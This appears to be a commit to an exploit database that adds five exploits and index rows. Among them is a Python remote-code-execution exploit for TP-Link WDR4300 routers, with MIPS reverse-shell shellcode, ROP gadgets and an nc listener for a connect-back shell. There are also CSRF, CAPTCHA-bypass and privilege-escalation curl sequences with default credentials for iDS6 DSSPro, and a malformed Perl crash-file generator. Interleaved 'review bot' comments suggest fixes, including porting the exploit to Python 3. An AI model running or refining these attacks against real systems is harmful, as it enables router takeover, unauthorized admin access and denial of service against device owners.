DB: 2020-11-06
5 changes to exploits/shellcodes:

Amarok 2.8.0 - Denial-of-Service
TP-Link WDR4300 - Remote Code Execution (Authenticated)
iDS6 DSSPro Digital Signage System 6.2 - Cross-Site Request Forgery (CSRF)
iDS6 DSSPro Digital Signage System 6.2 - CAPTCHA Security Bypass
iDS6 DSSPro Digital Signage System 6.2 - Improper Access Control Privilege Escalation
This commit is contained in:
parent
543f8dc781
commit
6eb03eae23
6 changed files with 498 additions and 0 deletions
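--- a/exploits/hardware/remote/48994.py
+++ b/exploits/hardware/remote/48994.py
@@ -0,0 +1,219 @@
+# Exploit Title: TP-Link WDR4300 - Remote Code Execution (Authenticated)
+# Date: 2020-08-28
+# Exploit Author: Patrik Lantz
+# Vendor Homepage: https://www.tp-link.com/se/home-networking/wifi-router/tl-wdr4300/
+# Version: TL-WDR4300, N750 Wireless Dual Band Gigabit Router
+# Tested on: Firmware version 3.13.33 and 3.14.3
+# CVE : CVE-2017-13772
+
+#!/usr/bin/python3
+
+import sys
+import hashlib
+import base64
+import requests
+import binascii
+import socket
+
+
+"""
+RCE via stack-based overflow on TP-Link WDR4300 (N750) devices, using CVE-2017-13772.
+Tested on Firmware versions 3.13.33, Build 130618 and 3.14.3 Build 150518, hardware WDR4300 v1
+
+Usage:
+1) Start listener on attacker machine: nc -nlvvp 31337
+2) Execute script: python exploit.py <attacker_ip>
+
+"""
+
+def main(argv):
+    if len(sys.argv) < 2:
+        print("Usage: python exploit.py <attacker_ip>")
+        sys.exit(1)
+
+    password = "admin"
+    target = "192.168.0.1:80"
+    attacker_ip = sys.argv[1]
+
+    attacker = binascii.hexlify(socket.inet_aton(attacker_ip))
+    ip = [attacker[i:i+2] for i in range(0, len(attacker), 2)]
+
+    if '00' in ip or '20' in ip:
+        print("[-] Specified attacker IP will result in bad characters being present in the shellcode. Avoid any IPs containing .0. and .32.")
+        sys.exit(1)
+
+    url = "http://" + target + "/"
+    try:
+        r = requests.get(url=url)
+    except:
+        print("[-] Could not connect to target: " + target)
+        sys.exit(1)
+
+    if 'WWW-Authenticate' in r.headers.keys():
+        if not 'WDR4300' in r.headers['WWW-Authenticate']:
+            print("[-] This is not TP-Link WDR4300 (N750)")
+            sys.exit(1)
+    else:
+        print("[-] This does not seem to be the web interface of a router!")
+
+
+    credentials = "admin" + ":" + hashlib.md5(password).hexdigest()
+    auth = base64.b64encode(credentials)
+    url = "http://" + target + "/userRpm/LoginRpm.htm?Save=Save"
+
+    print("[+] Setting target to: " + target)
+    print("[+] Using default admin password: " + password)
+    print("[+] Cookie set to: Authorization=Basic%20" + auth)
+
+    h = {}
+    h["Cookie"] = "Authorization=Basic%20" + auth
+    h['Upgrade-Insecure-Requests'] = '1'
+    h['Referer'] = 'http://' + target + '/'
+
+    r = requests.get(url = url, headers=h)
+    data = r.text
+    if "httpAutErrorArray" in data:
+        print('[-] Could not login to the admin interface')
+        sys.exit(1)
+
+    older_fw = False
+    # older firmware, e.g., 3.13.33
+    if "<TITLE>Login Incorrect</TITLE>" in data:
+        print("[-] Incorrect login, perhaps an older firmware? Sending digest authetnication using the Authorization header instead..")
+        credentials = "admin:" + password
+        auth = base64.b64encode(credentials)
+        url = "http://" + target + "/"
+        h = {}
+        h["Authorization"] = "Basic%20" + auth
+        h['Upgrade-Insecure-Requests'] = '1'
+        h['Referer'] = 'http://' + target + '/'
+        r = requests.get(url = url, headers=h)
+        data = r.text
+        if 'window.parent.location.href' not in data:
+            print("[-] Failed to login to the admin interface")
+            sys.exit(1)
+        print('[+] Older firmware confirmed, successfully logged in')
+        older_fw = True
+
+    authenticated_url = data.split('window.parent.location.href = ')[1].split(';')[0].replace('"','')
+
+
+    unique_id = ''
+    if not older_fw:
+        unique_id = authenticated_url.split('/userRpm')[0].split('/')[3] + '/'
+        print("[+] Authentication succeeded, got unique id: " + unique_id.replace('/',''))
+
+    # now we deliver the exploit payload via a GET request
+    h['Referer'] = 'http://' + target + '/' + unique_id + 'userRpm/DiagnosticRpm.htm'
+
+
+    # NOP sled (XOR $t0, $t0, $t0; as NOP is only null bytes)
+    nopsled = ""
+    for i in range(12):
+        nopsled += "\x26\x40\x08\x01"
+
+    # identified bad characters: 0x20,0x00
+    # Using reverse tcp shellcode from https://www.exploit-db.com/exploits/45541
+    buf = b""
+    buf += "\x24\x0f\xff\xfa" # li $t7, -6
+    buf += "\x01\xe0\x78\x27" # nor $t7, $zero
+    buf += "\x21\xe4\xff\xfd" # addi $a0, $t7, -3
+    buf += "\x21\xe5\xff\xfd" # addi $a1, $t7, -3
+    buf += "\x28\x06\xff\xff" # slti $a2, $zero, -1
+    buf += "\x24\x02\x10\x57" # li $v0, 4183 ( sys_socket )
+    buf += "\x01\x01\x01\x0c" # syscall 0x40404
+    buf += "\xaf\xa2\xff\xff" # sw $v0, -1($sp)
+    buf += "\x8f\xa4\xff\xff" # lw $a0, -1($sp)
+    buf += "\x34\x0f\xff\xfd" # li $t7, -3 ( sa_family = AF_INET )
+    buf += "\x01\xe0\x78\x27" # nor $t7, $zero
+    buf += "\xaf\xaf\xff\xe0" # sw $t7, -0x20($sp)
+    buf += "\x3c\x0e\x7a\x69" # lui $t6, 0x7a69 ( sin_port = 0x7a69 )
+    buf += "\x35\xce\x7a\x69" # ori $t6, $t6, 0x7a69
+    buf += "\xaf\xae\xff\xe4" # sw $t6, -0x1c($sp)
+    buf += "\x3c\x0e" + ip[0].decode('hex') + ip[1].decode('hex') # lui $t6, 0xAABB ( sin_addr = 0xAABB ...
+    buf += "\x35\xce" + ip[2].decode('hex') + ip[3].decode('hex') # ori $t6, $t6, 0xCCDD ... 0xCCDD
+    buf += "\xaf\xae\xff\xe6" # sw $t6, -0x1a($sp)
+    buf += "\x27\xa5\xff\xe2" # addiu $a1, $sp, -0x1e
+    buf += "\x24\x0c\xff\xef" # li $t4, -17 ( addrlen = 16 )
+    buf += "\x01\x80\x30\x27" # nor $a2, $t4, $zero
+    buf += "\x24\x02\x10\x4a" # li $v0, 4170 ( sys_connect )
+    buf += "\x01\x01\x01\x0c" # syscall 0x40404
+    buf += "\x24\x0f\xff\xfd" # li t7,-3
+    buf += "\x01\xe0\x28\x27" # nor a1,t7,zero
+    buf += "\x8f\xa4\xff\xff" # lw $a0, -1($sp)
+    buf += "\x24\x02\x0f\xdf" # li $v0, 4063 ( sys_dup2 )
+    buf += "\x01\x01\x01\x0c" # syscall 0x40404
+    buf += "\x24\xa5\xff\xff" # addi a1,a1,-1 (\x20\xa5\xff\xff)
+    buf += "\x24\x01\xff\xff" # li at,-1
+    buf += "\x14\xa1\xff\xfb" # bne a1,at, dup2_loop
+    buf += "\x28\x06\xff\xff" # slti $a2, $zero, -1
+    buf += "\x3c\x0f\x2f\x2f" # lui $t7, 0x2f2f
+    buf += "\x35\xef\x62\x69" # ori $t7, $t7, 0x6269
+    buf += "\xaf\xaf\xff\xec" # sw $t7, -0x14($sp)
+    buf += "\x3c\x0e\x6e\x2f" # lui $t6, 0x6e2f
+    buf += "\x35\xce\x73\x68" # ori $t6, $t6, 0x7368
+    buf += "\xaf\xae\xff\xf0" # sw $t6, -0x10($sp)
+    buf += "\xaf\xa0\xff\xf4" # sw $zero, -0xc($sp)
+    buf += "\x27\xa4\xff\xec" # addiu $a0, $sp, -0x14
+    buf += "\xaf\xa4\xff\xf8" # sw $a0, -8($sp)
+    buf += "\xaf\xa0\xff\xfc" # sw $zero, -4($sp)
+    buf += "\x27\xa5\xff\xf8" # addiu $a1, $sp, -8
+    buf += "\x24\x02\x0f\xab" # li $v0, 4011 (sys_execve)
+    buf += "\x01\x01\x01\x0c" # syscall 0x40404
+
+    shellcode = nopsled + buf
+
+    """
+    We control $ra, $s0 and $s1 via the buffer overflow.
+
+    libc_base: 0x2aae2000
+    First ROP (sleep_gadget): 0x0004c974 + libc_base = 0x2ab2e974
+    0x0004c97c move t9, s0
+    0x0004c980 lw ra, (var_1ch)
+    0x0004c984 lw s0, (var_18h)
+    0x0004c988 addiu a0, zero, 2 ; arg1
+    0x0004c98c addiu a1, zero, 1 ; arg2
+    0x0004c990 move a2, zero
+    0x0004c994 jr t9
+
+    sleep is located at 0x00053ca0 => so $s0 = 0x2ab35ca0
+
+    This gadget calls sleep, in this gadget we also set the return adress to the second ROP gadget which is controlled by setting appropriate value on the stack location 0x1c($sp), i.e., the first value on the stack, due to the instruction at 0x0004c980.
+
+
+    Second ROP (stack_gadget): 0x00039fa8 + libc_base = 0x2ab1bfa8
+    0x00039fa8 addiu s0, sp, 0x28
+    0x00039fac move a0, s3
+    0x00039fb0 move a1, s0
+    0x00039fb4 move t9, s1
+    0x00039fb8 jalr t9
+
+    This gadget will set s0 to point our shellcode on the stack, that must be located at sp+0x28.
+    Then as we control s1, we jump to the last and third ROP gadget.
+
+    Third ROP (call_gadget): 0x000406d8 + libc_base = 0x2ab226d8
+    0x000406d8 move t9, s0
+    0x000406dc jalr t9
+
+    Jump to the shellcode pointed in s0.
+    """
+
+    sleep_addr = "\x2a\xb3\x5c\xa0"
+    sleep_gadget = "\x2a\xb2\xe9\x74"
+    stack_gadget = "\x2a\xb1\xbf\xa8"
+    call_gadget = "\x2a\xb2\x26\xd8"
+
+    junk = "J"*28
+    payload = "A"*160 + sleep_addr + call_gadget + sleep_gadget + junk + stack_gadget + shellcode
+
+    p = {'ping_addr': payload, 'doType': 'ping', 'isNew': 'new', 'sendNum': '4', 'pSize':64, 'overTime':'800', 'trHops':'20'}
+    url = "http://" + target + "/" + unique_id + "userRpm/PingIframeRpm.htm"
+    print("[+] Delivering exploit payload to: " + url)
+    try:
+        r = requests.get(url = url, params=p, headers=h, timeout=10)
+    except:
+        print("[+] Finished delivering exploit")
+
+
+if __name__ == "__main__":
+    main(sys.argv[1:])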
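Review bot: The `#!/usr/bin/python3` shebang sits on line 9 of the file, where it has no effect, and the code under it is Python 2 only: `hashlib.md5(password)` and `base64.b64encode(credentials)` are called on `str`, `ip[0].decode('hex')` relies on the `hex` codec that Python 3 removed from `str`, and `buf = b""` is then extended with `str` literals, each of which raises `TypeError` on Python 3. Either move the shebang to line 1 and make it name the interpreter the code actually targets, or update the string handling for Python 3; as committed, the docstring's `python exploit.py <attacker_ip>` only works when `python` is a 2.x interpreter. The two bare `except:` clauses also catch `KeyboardInterrupt` and `SystemExit`, so `except requests.exceptions.RequestException:` is the narrow form, and the `else:` branch that prints "This does not seem to be the web interface of a router!" falls through without `sys.exit(1)`, so the script keeps going against a host it has just classified as not a router. The `argv` parameter of `main` is unused, because the body reads `sys.argv` directly, so the `main(sys.argv[1:])` call passes a value that is ignored.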
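--- a/exploits/hardware/webapps/48990.txt
+++ b/exploits/hardware/webapps/48990.txt
@@ -0,0 +1,61 @@
+# Exploit Title: iDS6 DSSPro Digital Signage System 6.2 - Cross-Site Request Forgery (CSRF)
+# Date: 2020-07-16
+# Exploit Author: LiquidWorm
+# Vendor Homepage: http://www.yerootech.com
+# Version: 6.2
+
+iDS6 DSSPro Digital Signage System 6.2 Cross-Site Request Forgery (CSRF)
+
+
+Vendor: Guangzhou Yeroo Tech Co., Ltd.
+Product web page: http://www.yerootech.com
+Affected version: V6.2 B2014.12.12.1220
+V5.6 B2017.07.12.1757
+V4.3
+
+Summary: iDS6 Software's DSSPro network digital signage management system
+is a web-based server software solution for Windows.
+
+Desc: The application interface allows users to perform certain actions via
+HTTP requests without performing any validity checks to verify the requests.
+This can be exploited to perform certain actions with administrative privileges
+if a logged-in user visits a malicious web site.
+
+Tested on: Microsoft Windows XP
+Microsoft Windows 7
+Microsfot Windows Server 2008
+Microsoft Windows Server 2012
+Microsoft Windows 10
+Apache Tomcat/8.0.44
+Apache Tomcat/6.0.35
+Apache-Coyote/1.1
+Apache Axis/1.4
+MySQL 5.5.25
+Java 1.8.0
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+@zeroscience
+
+
+Advisory ID: ZSL-2020-5606
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5606.php
+
+
+16.07.2020
+
+--
+
+
+Add user:
+---------
+
+<html>
+<body>
+<form action="http://192.168.1.88/Pages/user!addUser" method="POST">
+<input type="hidden" name="user.userName" value="testingus" />
+<input type="hidden" name="user.password" value="zeroscience" />
+<input type="submit" value="add()" />
+</form>
+</body>
+</html>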
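--- a/exploits/hardware/webapps/48991.txt
+++ b/exploits/hardware/webapps/48991.txt
@@ -0,0 +1,77 @@
+# Exploit Title: iDS6 DSSPro Digital Signage System 6.2 - CAPTCHA Security Bypass
+# Date: 2020-07-16
+# Exploit Author: LiquidWorm
+# Vendor Homepage: http://www.yerootech.com
+# Version: 6.2
+
+iDS6 DSSPro Digital Signage System 6.2 CAPTCHA Security Bypass
+
+
+Vendor: Guangzhou Yeroo Tech Co., Ltd.
+Product web page: http://www.yerootech.com
+Affected version: V6.2 B2014.12.12.1220
+V5.6 B2017.07.12.1757
+V4.3
+
+Summary: iDS6 Software's DSSPro network digital signage management
+system is a web-based server software solution for Windows.
+
+Desc: The CAPTCHA function for DSSPro is prone to a security bypass
+vulnerability that occurs in the CAPTCHA authentication routine. By
+requesting the autoLoginVerifyCode object an attacker can receive a
+JSON message code and successfully bypass the CAPTCHA-based authentication
+challenge and perform brute-force attacks.
+
+Tested on: Microsoft Windows XP
+Microsoft Windows 7
+Microsfot Windows Server 2008
+Microsoft Windows Server 2012
+Microsoft Windows 10
+Apache Tomcat/8.0.44
+Apache Tomcat/6.0.35
+Apache-Coyote/1.1
+Apache Axis/1.4
+MySQL 5.5.25
+Java 1.8.0
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+@zeroscience
+
+
+Advisory ID: ZSL-2020-5607
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5607.php
+
+
+16.07.2020
+
+--
+
+
+Get CAPTCHA code:
+-----------------
+
+$ curl -i http://192.168.1.88/Pages/login\!autoLoginVerifyCode -c cookies.txt
+
+{"success":true,"message":"6435","data":"6435"}
+
+
+Use CAPTCHA code:
+-----------------
+
+$ curl -i http://192.168.1.88/Pages/login\!userValidate -b cookies.txt -d "shortName=&user.userName=boss&user.password=boss&loginVerifyCode=6435&autoSave=true&autoLogin=true&domain_login=" -v
+
+HTTP/1.1 200 OK
+Server: Apache-Coyote/1.1
+Set-Cookie: cookie.username=boss; Expires=Wed, 21-Jul-2021 19:41:26 GMT
+Set-Cookie: cookie.password=boss; Expires=Wed, 01-Jul-2021 19:41:26 GMT
+Set-Cookie: cookie.autosave=true; Expires=Wed, 01-Jul-2021 19:41:26 GMT
+Set-Cookie: cookie.autologin=true; Expires=Wed, 01-Jul-2021 19:41:26 GMT
+Cache-Control: no-cache
+Pragma: no-cache
+Content-Type: application/x-json;charset=UTF-8
+Date: Tue, 21 Jul 2020 19:41:26 GMT
+Connection: close
+Content-Length: 16
+
+{"success":true}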
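Review bot: The captured response at the end of the file shows the server answering the `autoSave=true` login with `Set-Cookie: cookie.password=boss`, i.e. the submitted password echoed back in cleartext as a persistent cookie with a roughly one-year `Expires`, yet the Desc section only describes the CAPTCHA bypass. That is a distinct weakness worth one sentence in the advisory text, since any exposure of the cookie jar (logs, proxies, a shared workstation) then yields a reusable credential rather than a session. Something like `The autoSave option also stores the plaintext password in the cookie.password cookie.` after the Desc paragraph would let readers assess both issues.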
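--- a/exploits/hardware/webapps/48992.txt
+++ b/exploits/hardware/webapps/48992.txt
@@ -0,0 +1,121 @@
+# Exploit Title: iDS6 DSSPro Digital Signage System 6.2 - Improper Access Control Privilege Escalation
+# Date: 2020-07-16
+# Exploit Author: LiquidWorm
+# Vendor Homepage: http://www.yerootech.com
+# Version: 6.2
+
+iDS6 DSSPro Digital Signage System 6.2 Improper Access Control Privilege Escalation
+
+
+Vendor: Guangzhou Yeroo Tech Co., Ltd.
+Product web page: http://www.yerootech.com
+Affected version: V6.2 B2014.12.12.1220
+V5.6 B2017.07.12.1757
+V4.3
+
+Summary: iDS6 Software's DSSPro network digital signage management system
+is a web-based server software solution for Windows.
+
+Desc: The application suffers from a privilege escalation vulnerability.
+An authenticated user can elevate his/her privileges by calling JS functions
+from the console or by insecure direct object references to hidden functionalities
+that can result in creating users, modifying roles and permissions and full
+takeover of the application.
+
+Tested on: Microsoft Windows XP
+Microsoft Windows 7
+Microsfot Windows Server 2008
+Microsoft Windows Server 2012
+Microsoft Windows 10
+Apache Tomcat/8.0.44
+Apache Tomcat/6.0.35
+Apache-Coyote/1.1
+Apache Axis/1.4
+MySQL 5.5.25
+Java 1.8.0
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+@zeroscience
+
+
+Advisory ID: ZSL-2020-5608
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5608.php
+
+
+16.07.2020
+
+--
+
+
+--------------------
+Default credentials:
+--------------------
+
+admin:123456 (id: n/k, access: /admin)
+boss:boss (id: 100001, access: /)
+user:user (id: 100002, access: /)
+
+
+----------------------------
+Once logged-in, create user:
+----------------------------
+
+In Console, once navigated to the Accounts->User page (http://192.168.1.88/Pages/user.action)
+Type: add()
+
+or issue a POST request:
+
+$ curl -d "user.userName=testingus&user.password=testingus" http://192.168.1.88/Pages/user\!addUser -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B"
+
+
+--------------
+List user IDs:
+--------------
+
+$ curl -d "az=asc" http://192.168.1.88/Pages/user\!list -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B"
+
+
+------------
+Create role:
+------------
+
+In Console, once navigated to the Accounts->Role page (http://192.168.1.88/Pages/role.action):
+Type: add()
+
+or issue a POST request:
+
+$ curl -d "role.roleName=ROLENAME&role.description=ROLEDESC" http://192.168.1.88/Pages/role\!add -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B"
+
+
+--------------
+List role IDs:
+--------------
+
+$ curl -X POST http://192.168.1.88/Pages/role\!list -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B"
+
+
+------------------------------------------
+Apply all permissions to the created role:
+------------------------------------------
+
+$ curl http://192.168.1.88/Pages/role\!updatePermissions -d "role.roleId={ROLE_ID}&privileges=2&privileges=1&privileges=3&privileges=4&privileges=7&privileges=6&privileges=5&privileges=12&privileges=8&privileges=13&privileges=9&privileges=10&privileges=11&privileges=14&privileges=16&privileges=15&privileges=17&privileges=18&privileges=21&privileges=33&privileges=32&privileges=34&privileges=35&privileges=36&privileges=37&privileges=23&privileges=22&privileges=24&privileges=41&privileges=47&privileges=46&privileges=48&privileges=49&privileges=50&privileges=51&privileges=52&privileges=53"
+
+
+------------------------------------
+Assign created role to created user:
+------------------------------------
+
+$ curl -d "user.userId={USER_ID}&roles={ROLE_ID}" http://192.168.1.88/Pages/user\!updateRole -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B"
+
+
+------------
+Delete user:
+------------
+
+In Console, once navigated to the Accounts->User page (http://192.168.1.88/Pages/user.action), select desired username:
+Type: del()
+
+or issue a POST request:
+
+$ curl -d "userid={USER_ID}" http://192.168.1.88/Pages/user\!del -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B"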
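--- a/exploits/windows/local/48993.pl
+++ b/exploits/windows/local/48993.pl
@@ -0,0 +1,15 @@
+# Exploit Title: Amarok 2.8.0 - Denial-of-Service
+# Date: 1 November 2020
+# Exploit Author: FishballAndMeatball
+# Vendor Homepage: https://amarok.kde.org/
+# Software link: https://community.kde.org/Amarok/GettingStarted/Download
+# Version: Amarok 2.8.0
+# Tested on: Windows 10, Windows 7, Windows XP
+# CVE: CVE-2020-13152
+
+my $file= “test_big.m3u“;
+my $junk= “\x41” x 6368545;
+open($FILE,”>$file”);
+print $FILE “$junk”;
+close($FILE);
+print “m3u File Created successfully\n”;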
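Review bot: The string literals on the `my $file`, `my $junk`, `open` and both `print` lines use typographic quotes (“ and ”, and the file name even closes with a second “) instead of ASCII `"`, so perl cannot parse the file as committed; every literal needs plain double quotes. The `open($FILE,”>$file”)` call is also the two-argument form on an undeclared global filehandle with no error check, and the usual form is `open(my $fh, '>', $file) or die "$file: $!";` with `$fh` used in the following `print` and `close` lines.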
|
@ -10399,6 +10399,7 @@ id,file,description,date,author,type,platform,port
|
|||
48968,exploits/windows/local/48968.txt,"IP Watcher v3.0.0.30 - 'PACService.exe' Unquoted Service Path",2020-10-28,"Mohammed Alshehri",local,windows,
|
||||
48982,exploits/windows/local/48982.pdf,"Foxit Reader 9.7.1 - Remote Command Execution (Javascript API)",2020-11-02,"Nassim Asrir",local,windows,
|
||||
48983,exploits/windows/local/48983.txt,"Quick N Easy FTP Service 3.2 - Unquoted Service Path",2020-11-02,yunaranyancat,local,windows,
|
||||
48993,exploits/windows/local/48993.pl,"Amarok 2.8.0 - Denial-of-Service",2020-11-05,FishballAndMeatball,local,windows,
|
||||
42887,exploits/linux/local/42887.c,"Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation",2017-09-26,"Qualys Corporation",local,linux,
|
||||
42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows,
|
||||
42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows,
|
||||
|
@ -17837,6 +17838,7 @@ id,file,description,date,author,type,platform,port
|
|||
48842,exploits/hardware/remote/48842.py,"Sony IPELA Network Camera 1.82.01 - 'ftpclient.cgi' Remote Stack Buffer Overflow",2020-10-01,LiquidWorm,remote,hardware,
|
||||
48954,exploits/hardware/remote/48954.txt,"Adtec Digital Multiple Products - Default Hardcoded Credentials Remote Root",2020-10-27,LiquidWorm,remote,hardware,
|
||||
48958,exploits/hardware/remote/48958.py,"GoAhead Web Server 5.1.1 - Digest Authentication Capture Replay Nonce Reuse",2020-10-27,LiquidWorm,remote,hardware,
|
||||
48994,exploits/hardware/remote/48994.py,"TP-Link WDR4300 - Remote Code Execution (Authenticated)",2020-11-05,"Patrik Lantz",remote,hardware,
|
||||
42806,exploits/java/remote/42806.py,"Oracle WebLogic Server 10.3.6.0 - Java Deserialization Remote Code Execution",2017-09-27,SlidingWindow,remote,java,
|
||||
42888,exploits/hardware/remote/42888.sh,"Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution",2017-09-27,"Adam Brown",remote,hardware,
|
||||
42891,exploits/windows/remote/42891.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Man In The Middle Remote Code Execution",2017-09-28,hyp3rlinx,remote,windows,
|
||||
|
@ -40808,6 +40810,9 @@ id,file,description,date,author,type,platform,port
|
|||
48987,exploits/php/webapps/48987.txt,"PDW File Browser 1.3 - Remote Code Execution",2020-11-04,"David Bimmel",webapps,php,
|
||||
48988,exploits/php/webapps/48988.py,"School Log Management System 1.0 - 'username' SQL Injection / Remote Code Execution",2020-11-04,Mosaaed,webapps,php,
|
||||
48989,exploits/php/webapps/48989.py,"Student Attendance Management System 1.0 - 'username' SQL Injection / Remote Code Execution",2020-11-04,Mosaaed,webapps,php,
|
||||
48990,exploits/hardware/webapps/48990.txt,"iDS6 DSSPro Digital Signage System 6.2 - Cross-Site Request Forgery (CSRF)",2020-11-05,LiquidWorm,webapps,hardware,
|
||||
48991,exploits/hardware/webapps/48991.txt,"iDS6 DSSPro Digital Signage System 6.2 - CAPTCHA Security Bypass",2020-11-05,LiquidWorm,webapps,hardware,
|
||||
48992,exploits/hardware/webapps/48992.txt,"iDS6 DSSPro Digital Signage System 6.2 - Improper Access Control Privilege Escalation",2020-11-05,LiquidWorm,webapps,hardware,
|
||||
42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
|
||||
42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
|
||||
42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,
|
||||
|